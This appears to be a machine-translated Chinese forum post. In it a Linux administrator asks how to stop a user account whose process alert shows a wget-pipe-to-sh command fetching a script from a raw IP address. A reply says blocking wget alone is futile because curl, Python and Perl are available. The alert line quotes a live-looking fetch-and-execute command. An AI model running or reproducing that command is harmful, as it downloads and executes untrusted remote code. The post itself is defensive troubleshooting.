Linux
處理警報 - 停止或阻止使用者執行此操作
我將如何解決這個問題?我已經嘗試過如何在The Geek Diary中為 Linux 中的特定使用者禁用特定命令
User:clipdrop PID:8426 PPID:8401 Run Time:0(secs) Memory:113280(kb) RSS:1180(kb) exe:/usr/bin/bash cmd:/bin/sh -c wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
編輯#1
執行
getfacl /usr/bin/wget
我得到:getfacl: Removing leading '/' from absolute path names # file: usr/bin/wget # owner: root # group: root user::rwx user:clipdrop:--- group::r-x mask::r-x other::r-x
curl
在 Unix/Linux 上,獲取替代工具來執行任何惡意行為(下載隨機文件、使用任何 FTP 客戶端、使用 Web 瀏覽器,甚至在 emacs 中使用 Web 瀏覽器;獲取原始碼)太容易了從控製版本系統並自己編譯;使案例如 Python、Perl,它們具有內置的大多數“典型”網路任務,或者作為或多或少標準庫的一部分)。